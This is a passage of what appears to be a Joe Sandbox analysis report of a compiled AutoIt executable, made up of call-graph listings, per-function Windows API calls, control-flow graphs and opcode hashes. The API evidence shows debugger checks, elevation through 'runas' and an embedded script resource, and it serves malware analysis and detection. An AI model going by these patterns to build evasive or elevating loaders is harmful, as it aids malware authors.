95013->95012 95015 7ff6b5ba1d61 95014->95015 95016 7ff6b5ba1d71 95014->95016 95017 7ff6b5b548e0 89 API calls 95015->95017 95018 7ff6b5ba1dbf 95016->95018 95019 7ff6b5ba1d7a 95016->95019 95020 7ff6b5b548e0 89 API calls 95016->95020 95017->95016 95041 7ff6b5ba2038 95018->95041 95019->94713 95022 7ff6b5ba1d9e 95020->95022 95022->95018 95024 7ff6b5ba1da7 95022->95024 95023 7ff6b5ba1df5 95025 7ff6b5ba1df9 95023->95025 95026 7ff6b5ba1e1c 95023->95026 95024->95019 95053 7ff6b5b54970 95024->95053 95028 7ff6b5ba1e07 95025->95028 95029 7ff6b5b54970 62 API calls 95025->95029 95030 7ff6b5ba1e4a 95026->95030 95031 7ff6b5ba1e2a 95026->95031 95028->95019 95032 7ff6b5b54970 62 API calls 95028->95032 95029->95028 95045 7ff6b5ba1e88 95030->95045 95033 7ff6b5ba1e38 95031->95033 95035 7ff6b5b54970 62 API calls 95031->95035 95032->95019 95033->95019 95036 7ff6b5b54970 62 API calls 95033->95036 95035->95033 95036->95019 95037 7ff6b5ba1e52 95038 7ff6b5ba1e68 95037->95038 95039 7ff6b5b54970 62 API calls 95037->95039 95038->95019 95040 7ff6b5b54970 62 API calls 95038->95040 95039->95038 95040->95019 95042 7ff6b5ba2069 95041->95042 95044 7ff6b5ba2056 memcpy_s 95041->95044 95043 7ff6b5b54c5c _fread_nolock 45 API calls 95042->95043 95043->95044 95044->95023 95046 7ff6b5ba1fb0 95045->95046 95051 7ff6b5ba1eaa 95045->95051 95047 7ff6b5ba1fd3 95046->95047 95067 7ff6b5b52a04 60 API calls 2 library calls 95046->95067 95047->95037 95049 7ff6b5ba1bd0 45 API calls 95049->95051 95051->95046 95051->95047 95051->95049 95051->95051 95065 7ff6b5ba1c9c 45 API calls 95051->95065 95066 7ff6b5ba20cc 60 API calls 95051->95066 95054 7ff6b5b549a3 95053->95054 95055 7ff6b5b5498e 95053->95055 95064 7ff6b5b5499e 95054->95064 95068 7ff6b5b4df54 EnterCriticalSection 95054->95068 95069 7ff6b5b555d4 15 API calls _invalid_parameter_noinfo 95055->95069 95057 7ff6b5b54993 95070 7ff6b5b5b164 31 API calls _invalid_parameter_noinfo 95057->95070 95060 7ff6b5b549b9 95061 7ff6b5b548ec 60 API calls 95060->95061 95062 7ff6b5b549c2 95061->95062 95063 7ff6b5b4df60 fflush LeaveCriticalSection 95062->95063 95063->95064 95064->95019 95065->95051 95066->95051 95067->95047 95069->95057 95070->95064 95072 7ff6b5b68f90 wcsftime 95071->95072 95073 7ff6b5b23ec4 GetLongPathNameW 95072->95073 95074 7ff6b5b27cf4 4 API calls 95073->95074 95075 7ff6b5b23eed 95074->95075 95076 7ff6b5b24074 95075->95076 95077 7ff6b5b29640 4 API calls 95076->95077 95078 7ff6b5b2408e 95077->95078 95079 7ff6b5b256d4 5 API calls 95078->95079 95080 7ff6b5b2409b 95079->95080 95081 7ff6b5b240a7 95080->95081 95082 7ff6b5b6bada 95080->95082 95084 7ff6b5b24680 4 API calls 95081->95084 95088 7ff6b5b6bb0f 95082->95088 95123 7ff6b5b41ad0 CompareStringW 95082->95123 95085 7ff6b5b240b5 95084->95085 95119 7ff6b5b240e8 95085->95119 95087 7ff6b5b240cb Concurrency::wait 95087->94597 95090 7ff6b5b26460 105 API calls 95089->95090 95091 7ff6b5b263e5 95090->95091 95092 7ff6b5b6c656 95091->95092 95094 7ff6b5b26460 105 API calls 95091->95094 95093 7ff6b5ba2948 90 API calls 95092->95093 95095 7ff6b5b6c66e 95093->95095 95096 7ff6b5b26400 95094->95096 95097 7ff6b5b6c672 95095->95097 95098 7ff6b5b6c690 95095->95098 95096->95092 95099 7ff6b5b26408 95096->95099 95100 7ff6b5b2652c 63 API calls 95097->95100 95101 7ff6b5b44c68 4 API calls 95098->95101 95102 7ff6b5b6c67b 95099->95102 95103 7ff6b5b26414 95099->95103 95100->95102 95118 7ff6b5b6c6dd Concurrency::wait 95101->95118 95125 7ff6b5b9c5c8 77 API calls wprintf 95102->95125 95124 7ff6b5b2e774 143 API calls Concurrency::wait 95103->95124 95106 7ff6b5b26438 95106->94590 95107 7ff6b5b6c68a 95107->95098 95108 7ff6b5b6c895 95109 7ff6b5b2652c 63 API calls 95108->95109 95117 7ff6b5b6c8a9 95109->95117 95114 7ff6b5b2ec00 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95114->95118 95117->95108 95131 7ff6b5b976d8 77 API calls 3 library calls 95117->95131 95118->95108 95118->95114 95118->95117 95126 7ff6b5b97400 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 95118->95126 95127 7ff6b5b9730c 39 API calls 95118->95127 95128 7ff6b5ba0210 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95118->95128 95129 7ff6b5b2b26c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 95118->95129 95130 7ff6b5b29940 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95118->95130 95120 7ff6b5b24107 95119->95120 95122 7ff6b5b24130 memcpy_s 95119->95122 95121 7ff6b5b44c68 4 API calls 95120->95121 95121->95122 95122->95087 95123->95082 95124->95106 95125->95107 95126->95118 95127->95118 95128->95118 95129->95118 95130->95118 95131->95117 95133 7ff6b5b29762 95132->95133 95138 7ff6b5b2988d 95132->95138 95134 7ff6b5b44c68 4 API calls 95133->95134 95133->95138 95136 7ff6b5b29791 95134->95136 95135 7ff6b5b44c68 4 API calls 95141 7ff6b5b2981c 95135->95141 95136->95135 95138->94602 95141->95138 95144 7ff6b5b2abe0 81 API calls 2 library calls 95141->95144 95145 7ff6b5b29940 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95141->95145 95146 7ff6b5b2b26c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 95141->95146 95142->94604 95143->94606 95144->95141 95145->95141 95146->95141 95147->94617 95148 7ff6b5b48fac 95149 7ff6b5b4901c 95148->95149 95150 7ff6b5b48fd2 GetModuleHandleW 95148->95150 95165 7ff6b5b5b9bc EnterCriticalSection 95149->95165 95150->95149 95159 7ff6b5b48fdf 95150->95159 95152 7ff6b5b490cb 95153 7ff6b5b5ba10 _isindst LeaveCriticalSection 95152->95153 95156 7ff6b5b490f0 95153->95156 95154 7ff6b5b49026 95154->95152 95155 7ff6b5b490a0 95154->95155 95163 7ff6b5b5aa8c 30 API calls 95154->95163 95157 7ff6b5b490b8 95155->95157 95161 7ff6b5b5ada4 75 API calls 95155->95161 95158 7ff6b5b490fc 95156->95158 95164 7ff6b5b49118 11 API calls 95156->95164 95162 7ff6b5b5ada4 75 API calls 95157->95162 95159->95149 95166 7ff6b5b49164 GetModuleHandleExW 95159->95166 95161->95157 95162->95152 95163->95155 95164->95158 95167 7ff6b5b491b5 95166->95167 95168 7ff6b5b4918e GetProcAddress 95166->95168 95169 7ff6b5b491c5 95167->95169 95170 7ff6b5b491bf FreeLibrary 95167->95170 95168->95167 95171 7ff6b5b491a8 95168->95171 95169->95149 95170->95169 95171->95167 95172 7ff6b5b25dec 95173 7ff6b5b25df4 95172->95173 95174 7ff6b5b25e98 95173->95174 95175 7ff6b5b25e28 95173->95175 95199 7ff6b5b25e96 95173->95199 95177 7ff6b5b6c229 95174->95177 95178 7ff6b5b25e9e 95174->95178 95179 7ff6b5b25f21 PostQuitMessage 95175->95179 95180 7ff6b5b25e35 95175->95180 95176 7ff6b5b25e6b DefWindowProcW 95202 7ff6b5b25e7c 95176->95202 95228 7ff6b5b3ede4 8 API calls 95177->95228 95181 7ff6b5b25ecc SetTimer RegisterWindowMessageW 95178->95181 95182 7ff6b5b25ea5 95178->95182 95179->95202 95183 7ff6b5b25e40 95180->95183 95184 7ff6b5b6c2af 95180->95184 95189 7ff6b5b25efc CreatePopupMenu 95181->95189 95181->95202 95187 7ff6b5b6c1b8 95182->95187 95188 7ff6b5b25eae KillTimer 95182->95188 95190 7ff6b5b25e49 95183->95190 95191 7ff6b5b25f2b 95183->95191 95240 7ff6b5b9a40c 16 API calls __scrt_fastfail 95184->95240 95186 7ff6b5b6c255 95229 7ff6b5b42c44 47 API calls Concurrency::wait 95186->95229 95196 7ff6b5b6c1bd 95187->95196 95197 7ff6b5b6c1f7 MoveWindow 95187->95197 95214 7ff6b5b25d88 95188->95214 95189->95202 95190->95199 95200 7ff6b5b25f0b 95190->95200 95201 7ff6b5b25e5f 95190->95201 95218 7ff6b5b44610 95191->95218 95193 7ff6b5b6c2c3 95193->95176 95193->95202 95203 7ff6b5b6c1e4 SetFocus 95196->95203 95204 7ff6b5b6c1c2 95196->95204 95197->95202 95199->95176 95226 7ff6b5b25f3c 26 API calls __scrt_fastfail 95200->95226 95201->95176 95211 7ff6b5b25d88 Shell_NotifyIconW 95201->95211 95203->95202 95204->95201 95207 7ff6b5b6c1cb 95204->95207 95227 7ff6b5b3ede4 8 API calls 95207->95227 95209 7ff6b5b25f1f 95209->95202 95212 7ff6b5b6c280 95211->95212 95230 7ff6b5b26258 95212->95230 95215 7ff6b5b25d99 __scrt_fastfail 95214->95215 95216 7ff6b5b25de4 95214->95216 95217 7ff6b5b25db8 Shell_NotifyIconW 95215->95217 95225 7ff6b5b27098 DeleteObject DestroyWindow Concurrency::wait 95216->95225 95217->95216 95219 7ff6b5b446db 95218->95219 95220 7ff6b5b4461a __scrt_fastfail 95218->95220 95219->95202 95241 7ff6b5b272c8 95220->95241 95222 7ff6b5b446a2 KillTimer SetTimer 95222->95219 95223 7ff6b5b44660 95223->95222 95224 7ff6b5b8aaa1 Shell_NotifyIconW 95223->95224 95224->95222 95225->95202 95226->95209 95227->95202 95228->95186 95229->95201 95231 7ff6b5b26287 __scrt_fastfail 95230->95231 95265 7ff6b5b261c4 95231->95265 95235 7ff6b5b6c644 Shell_NotifyIconW 95236 7ff6b5b2634e Shell_NotifyIconW 95238 7ff6b5b272c8 6 API calls 95236->95238 95237 7ff6b5b2632d 95237->95235 95237->95236 95239 7ff6b5b26365 95238->95239 95239->95199 95240->95193 95242 7ff6b5b273bc Concurrency::wait 95241->95242 95243 7ff6b5b272f4 95241->95243 95242->95223 95244 7ff6b5b298e8 4 API calls 95243->95244 95245 7ff6b5b27303 95244->95245 95246 7ff6b5b6cdfc LoadStringW 95245->95246 95247 7ff6b5b27310 95245->95247 95249 7ff6b5b6ce1e 95246->95249 95248 7ff6b5b27cf4 4 API calls 95247->95248 95250 7ff6b5b27324 95248->95250 95251 7ff6b5b2e0a8 4 API calls 95249->95251 95252 7ff6b5b27336 95250->95252 95253 7ff6b5b6ce30 95250->95253 95259 7ff6b5b2734f __scrt_fastfail wcscpy 95251->95259 95252->95249 95254 7ff6b5b27343 95252->95254 95264 7ff6b5b27c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 95253->95264 95263 7ff6b5b27c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 95254->95263 95257 7ff6b5b6ce3c 95258 7ff6b5b271f8 4 API calls 95257->95258 95257->95259 95260 7ff6b5b6ce63 95258->95260 95261 7ff6b5b273a3 Shell_NotifyIconW 95259->95261 95262 7ff6b5b271f8 4 API calls 95260->95262 95261->95242 95262->95259 95263->95259 95264->95257 95266 7ff6b5b6c5f8 95265->95266 95267 7ff6b5b261e0 95265->95267 95266->95267 95268 7ff6b5b6c602 DestroyIcon 95266->95268 95267->95237 95269 7ff6b5b9ad94 39 API calls wcsftime 95267->95269 95268->95267 95269->95237 95270 7ff6b5b7f890 95279 7ff6b5b2e18c 95270->95279 95272 7ff6b5b7f8a9 95274 7ff6b5b7f915 Concurrency::wait 95272->95274 95285 7ff6b5b42ac0 CharUpperBuffW RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95272->95285 95276 7ff6b5b803e1 Concurrency::wait 95274->95276 95287 7ff6b5ba34e4 77 API calls 3 library calls 95274->95287 95277 7ff6b5b7f8f6 95277->95274 95286 7ff6b5ba1464 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95277->95286 95280 7ff6b5b2e1a7 95279->95280 95281 7ff6b5b2e1c2 95279->95281 95288 7ff6b5b2ee20 5 API calls Concurrency::wait 95280->95288 95283 7ff6b5b2e1af 95281->95283 95289 7ff6b5b2ee20 5 API calls Concurrency::wait 95281->95289 95283->95272 95285->95277 95287->95276 95288->95283 95289->95283 95290 7ff6b5b35f13 95291 7ff6b5b35f1c memcpy_s 95290->95291 95292 7ff6b5b2d4cc 48 API calls 95291->95292 95293 7ff6b5b814b6 95291->95293 95296 7ff6b5b35f74 95291->95296 95299 7ff6b5b35abd memcpy_s Concurrency::wait 95291->95299 95300 7ff6b5b44c68 4 API calls 95291->95300 95292->95291 95301 7ff6b5b4364c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 95293->95301 95295 7ff6b5b814c5 95297 7ff6b5b2e0a8 4 API calls 95295->95297 95298 7ff6b5b2b960 4 API calls 95296->95298 95297->95299 95298->95299 95300->95291 95301->95295

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF6B5B23785), ref: 00007FF6B5B237F2
                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00007FF6B5B23785), ref: 00007FF6B5B23807
                                                                                                          • GetFullPathNameW.KERNEL32(?,?,?,?,?,00007FF6B5B23785), ref: 00007FF6B5B2388D
                                                                                                            • Part of subcall function 00007FF6B5B23F9C: GetFullPathNameW.KERNEL32(D000000000000000,00007FF6B5B238BF,?,?,?,?,?,00007FF6B5B23785), ref: 00007FF6B5B23FFD
                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF6B5B23785), ref: 00007FF6B5B23924
                                                                                                          • MessageBoxA.USER32 ref: 00007FF6B5B6B888
                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF6B5B23785), ref: 00007FF6B5B6B8E1
                                                                                                          • GetForegroundWindow.USER32(?,?,?,?,?,00007FF6B5B23785), ref: 00007FF6B5B6B968
                                                                                                          • ShellExecuteW.SHELL32 ref: 00007FF6B5B6B98F
                                                                                                            • Part of subcall function 00007FF6B5B23B84: GetSysColorBrush.USER32 ref: 00007FF6B5B23B9E
                                                                                                            • Part of subcall function 00007FF6B5B23B84: LoadCursorW.USER32 ref: 00007FF6B5B23BAE
                                                                                                            • Part of subcall function 00007FF6B5B23B84: LoadIconW.USER32 ref: 00007FF6B5B23BC3
                                                                                                            • Part of subcall function 00007FF6B5B23B84: LoadIconW.USER32 ref: 00007FF6B5B23BDC
                                                                                                            • Part of subcall function 00007FF6B5B23B84: LoadIconW.USER32 ref: 00007FF6B5B23BF5
                                                                                                            • Part of subcall function 00007FF6B5B23B84: LoadImageW.USER32 ref: 00007FF6B5B23C21
                                                                                                            • Part of subcall function 00007FF6B5B23B84: RegisterClassExW.USER32 ref: 00007FF6B5B23C85
                                                                                                            • Part of subcall function 00007FF6B5B23CBC: CreateWindowExW.USER32 ref: 00007FF6B5B23D0C
                                                                                                            • Part of subcall function 00007FF6B5B23CBC: CreateWindowExW.USER32 ref: 00007FF6B5B23D5F
                                                                                                            • Part of subcall function 00007FF6B5B23CBC: ShowWindow.USER32 ref: 00007FF6B5B23D75
                                                                                                            • Part of subcall function 00007FF6B5B26258: Shell_NotifyIconW.SHELL32 ref: 00007FF6B5B26350
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Load$IconWindow$CurrentDirectory$CreateFullNamePath$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell_Show
                                                                                                          • String ID: This is a third-party compiled AutoIt script.$runas
                                                                                                          • API String ID: 1593035822-3287110873
                                                                                                          • Opcode ID: 76182cffaad3958b66f0f298839ba34e861d4864c33095e5d1649e464e4238a0
                                                                                                          • Instruction ID: fccdac189e81beb8e8924860b4b521414f92187d75b9dde7e8c6844608219288
                                                                                                          • Opcode Fuzzy Hash: 76182cffaad3958b66f0f298839ba34e861d4864c33095e5d1649e464e4238a0
                                                                                                          • Instruction Fuzzy Hash: 2E717C22A1C68396FA609B2CE8651F86761FF42B44F800136E74DD61AFDF6DEE49C710

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 352 7ff6b5b26580-7ff6b5b265fc call 7ff6b5b44c68 call 7ff6b5b26c98 call 7ff6b5b45d00 359 7ff6b5b26737-7ff6b5b2673a 352->359 360 7ff6b5b26602-7ff6b5b26606 352->360 361 7ff6b5b6c9f5-7ff6b5b6c9fd call 7ff6b5ba2e00 359->361 362 7ff6b5b26740-7ff6b5b26753 CreateStreamOnHGlobal 359->362 363 7ff6b5b2660c-7ff6b5b26617 call 7ff6b5b55514 360->363 364 7ff6b5b6ca03-7ff6b5b6ca1e 360->364 361->364 362->360 366 7ff6b5b26759-7ff6b5b26777 FindResourceExW 362->366 372 7ff6b5b2661b-7ff6b5b2664e call 7ff6b5b267d8 363->372 375 7ff6b5b6ca27-7ff6b5b6ca60 call 7ff6b5b26810 call 7ff6b5b267d8 364->375 366->360 370 7ff6b5b2677d 366->370 373 7ff6b5b6c97e-7ff6b5b6c991 LoadResource 370->373 380 7ff6b5b266e8 372->380 381 7ff6b5b26654-7ff6b5b2665f 372->381 373->360 376 7ff6b5b6c997-7ff6b5b6c9a8 SizeofResource 373->376 384 7ff6b5b266ee 375->384 397 7ff6b5b6ca66 375->397 376->360 379 7ff6b5b6c9ae-7ff6b5b6c9ba LockResource 376->379 379->360 383 7ff6b5b6c9c0-7ff6b5b6c9f0 379->383 380->384 385 7ff6b5b266ae-7ff6b5b266b2 381->385 386 7ff6b5b26661-7ff6b5b2666f 381->386 383->360 388 7ff6b5b266f1-7ff6b5b26715 384->388 385->380 390 7ff6b5b266b4-7ff6b5b266cf call 7ff6b5b26810 385->390 389 7ff6b5b26670-7ff6b5b2667d 386->389 393 7ff6b5b26717-7ff6b5b26724 call 7ff6b5b44c24 * 2 388->393 394 7ff6b5b26729-7ff6b5b26736 388->394 395 7ff6b5b26680-7ff6b5b2668f 389->395 390->372 393->394 399 7ff6b5b26691-7ff6b5b26695 395->399 400 7ff6b5b266d4-7ff6b5b266dd 395->400 397->388 399->375 404 7ff6b5b2669b-7ff6b5b266a8 399->404 405 7ff6b5b266e3-7ff6b5b266e6 400->405 406 7ff6b5b26782-7ff6b5b2678c 400->406 404->389 408 7ff6b5b266aa 404->408 405->399 409 7ff6b5b26797-7ff6b5b267a1 406->409 410 7ff6b5b2678e 406->410 408->385 411 7ff6b5b267ce 409->411 412 7ff6b5b267a3-7ff6b5b267ad 409->412 410->409 411->373 413 7ff6b5b267c6 412->413 414 7ff6b5b267af-7ff6b5b267bb 412->414 413->411 414->395 415 7ff6b5b267c1 414->415 415->413
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                          • String ID: AU3!$EA06$SCRIPT
                                                                                                          • API String ID: 3051347437-2925976212
                                                                                                          • Opcode ID: 2a37f8564f4c8a4eeb189e72451b06d9c699f805bbd4e08f379393b5199a872e
                                                                                                          • Instruction ID: 77b2495fa1f0994d927213e83dfe76acaf9af7d4d4a591f1f2ac0a0c22cf047c
                                                                                                          • Opcode Fuzzy Hash: 2a37f8564f4c8a4eeb189e72451b06d9c699f805bbd4e08f379393b5199a872e
                                                                                                          • Instruction Fuzzy Hash: C291D372B0964186EB218F29E464AFC2B61BB46F84F454139DF5D8778ADF3AEC06C310

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 482 7ff6b5b41d80-7ff6b5b41e17 call 7ff6b5b29640 GetVersionExW call 7ff6b5b27cf4 487 7ff6b5b89450 482->487 488 7ff6b5b41e1d 482->488 490 7ff6b5b89457-7ff6b5b8945d 487->490 489 7ff6b5b41e20-7ff6b5b41e46 call 7ff6b5b2dda4 488->489 495 7ff6b5b41e4c 489->495 496 7ff6b5b41fc1 489->496 492 7ff6b5b89463-7ff6b5b89480 490->492 492->492 494 7ff6b5b89482-7ff6b5b89485 492->494 494->489 497 7ff6b5b8948b-7ff6b5b89491 494->497 499 7ff6b5b41e53-7ff6b5b41e59 495->499 496->487 497->490 498 7ff6b5b89493 497->498 501 7ff6b5b89498-7ff6b5b894a1 498->501 500 7ff6b5b41e5f-7ff6b5b41e7c 499->500 500->500 502 7ff6b5b41e7e-7ff6b5b41e81 500->502 501->499 503 7ff6b5b894a7 501->503 502->501 504 7ff6b5b41e87-7ff6b5b41ed6 call 7ff6b5b2dda4 502->504 503->496 507 7ff6b5b41edc-7ff6b5b41ede 504->507 508 7ff6b5b89645-7ff6b5b8964d 504->508 511 7ff6b5b41ee4-7ff6b5b41efa 507->511 512 7ff6b5b894ac-7ff6b5b894af 507->512 509 7ff6b5b8964f-7ff6b5b89658 508->509 510 7ff6b5b8965a-7ff6b5b8965d 508->510 517 7ff6b5b89686-7ff6b5b89692 509->517 510->517 518 7ff6b5b8965f-7ff6b5b89674 510->518 513 7ff6b5b89572-7ff6b5b89579 511->513 514 7ff6b5b41f00-7ff6b5b41f02 511->514 515 7ff6b5b41f3c-7ff6b5b41f80 GetCurrentProcess IsWow64Process call 7ff6b5b46240 512->515 516 7ff6b5b894b5-7ff6b5b89501 512->516 519 7ff6b5b89589-7ff6b5b89599 513->519 520 7ff6b5b8957b-7ff6b5b89584 513->520 521 7ff6b5b8959e-7ff6b5b895b3 514->521 522 7ff6b5b41f08-7ff6b5b41f0b 514->522 529 7ff6b5b8969d-7ff6b5b896b3 call 7ff6b5b932f4 515->529 539 7ff6b5b41f86-7ff6b5b41f8b GetSystemInfo 515->539 516->515 524 7ff6b5b89507-7ff6b5b8950e 516->524 517->529 525 7ff6b5b8967f 518->525 526 7ff6b5b89676-7ff6b5b8967d 518->526 519->515 520->515 530 7ff6b5b895c3-7ff6b5b895d3 521->530 531 7ff6b5b895b5-7ff6b5b895be 521->531 527 7ff6b5b41f11-7ff6b5b41f2d 522->527 528 7ff6b5b895ed-7ff6b5b895f0 522->528 533 7ff6b5b89510-7ff6b5b89518 524->533 534 7ff6b5b89534-7ff6b5b8953c 524->534 525->517 526->517 535 7ff6b5b895d8-7ff6b5b895e8 527->535 536 7ff6b5b41f33 527->536 528->515 538 7ff6b5b895f6-7ff6b5b89620 528->538 550 7ff6b5b896b5-7ff6b5b896d5 call 7ff6b5b932f4 529->550 551 7ff6b5b896d7-7ff6b5b896dc GetSystemInfo 529->551 530->515 531->515 540 7ff6b5b89526-7ff6b5b8952f 533->540 541 7ff6b5b8951a-7ff6b5b89521 533->541 542 7ff6b5b8953e-7ff6b5b89547 534->542 543 7ff6b5b8954c-7ff6b5b89554 534->543 535->515 536->515 545 7ff6b5b89630-7ff6b5b89640 538->545 546 7ff6b5b89622-7ff6b5b8962b 538->546 547 7ff6b5b41f91-7ff6b5b41fc0 539->547 540->515 541->515 542->515 548 7ff6b5b89564-7ff6b5b8956d 543->548 549 7ff6b5b89556-7ff6b5b8955f 543->549 545->515 546->515 548->515 549->515 553 7ff6b5b896e2-7ff6b5b896ea 550->553 551->553 553->547 555 7ff6b5b896f0-7ff6b5b896f7 FreeLibrary 553->555 555->547
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process$CurrentInfoSystemVersionWow64
                                                                                                          • String ID: |O
                                                                                                          • API String ID: 1568231622-607156228
                                                                                                          • Opcode ID: ec54e35f865d5c9bd0249927ea89c9316792baffd49f7d05aa477cb653b26fcc
                                                                                                          • Instruction ID: 8fce85c0f9c02dc2153e1fdf2bcc5f60ad2c501e59cd99098f22b861668775e5
                                                                                                          • Opcode Fuzzy Hash: ec54e35f865d5c9bd0249927ea89c9316792baffd49f7d05aa477cb653b26fcc
                                                                                                          • Instruction Fuzzy Hash: 1ED17012E1D692C6FAA28B1CA8661F53762EF12F84F444039D78DD26AFDF6CAD05C701

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 719 7ff6b5bbf630-7ff6b5bbf69e call 7ff6b5b46240 722 7ff6b5bbf6a0-7ff6b5bbf6b8 call 7ff6b5b2ffbc 719->722 723 7ff6b5bbf6d4-7ff6b5bbf6d9 719->723 734 7ff6b5bbf708-7ff6b5bbf70d 722->734 735 7ff6b5bbf6ba-7ff6b5bbf6d2 call 7ff6b5b2ffbc 722->735 724 7ff6b5bbf71e-7ff6b5bbf723 723->724 725 7ff6b5bbf6db-7ff6b5bbf6ef call 7ff6b5b2ffbc 723->725 728 7ff6b5bbf725-7ff6b5bbf729 724->728 729 7ff6b5bbf736-7ff6b5bbf75c call 7ff6b5b2d4cc call 7ff6b5b2e330 724->729 737 7ff6b5bbf6f3-7ff6b5bbf706 call 7ff6b5b2ffbc 725->737 733 7ff6b5bbf72d-7ff6b5bbf732 call 7ff6b5b2ffbc 728->733 748 7ff6b5bbf840-7ff6b5bbf84a 729->748 749 7ff6b5bbf762-7ff6b5bbf7cf call 7ff6b5b2d4cc call 7ff6b5b2e330 call 7ff6b5b2d4cc call 7ff6b5b2e330 call 7ff6b5b2d4cc call 7ff6b5b2e330 729->749 733->729 738 7ff6b5bbf70f-7ff6b5bbf717 734->738 739 7ff6b5bbf719-7ff6b5bbf71c 734->739 735->737 737->724 737->734 738->733 739->724 739->729 751 7ff6b5bbf87d-7ff6b5bbf8af GetCurrentDirectoryW call 7ff6b5b44c68 GetCurrentDirectoryW 748->751 752 7ff6b5bbf84c-7ff6b5bbf86e call 7ff6b5b2d4cc call 7ff6b5b2e330 748->752 797 7ff6b5bbf7d1-7ff6b5bbf7f3 call 7ff6b5b2d4cc call 7ff6b5b2e330 749->797 798 7ff6b5bbf806-7ff6b5bbf83e GetSystemDirectoryW call 7ff6b5b44c68 GetSystemDirectoryW 749->798 761 7ff6b5bbf8b5-7ff6b5bbf8b8 751->761 752->751 767 7ff6b5bbf870-7ff6b5bbf87b call 7ff6b5b48d58 752->767 764 7ff6b5bbf8f0-7ff6b5bbf8ff call 7ff6b5b9f464 761->764 765 7ff6b5bbf8ba-7ff6b5bbf8eb call 7ff6b5b3f688 * 3 761->765 774 7ff6b5bbf901-7ff6b5bbf903 764->774 775 7ff6b5bbf905-7ff6b5bbf95d call 7ff6b5b9fddc call 7ff6b5b9fca8 call 7ff6b5b9fafc 764->775 765->764 767->751 767->764 779 7ff6b5bbf964-7ff6b5bbf96c 774->779 775->779 809 7ff6b5bbf95f 775->809 784 7ff6b5bbfa0f-7ff6b5bbfa4b CreateProcessW 779->784 785 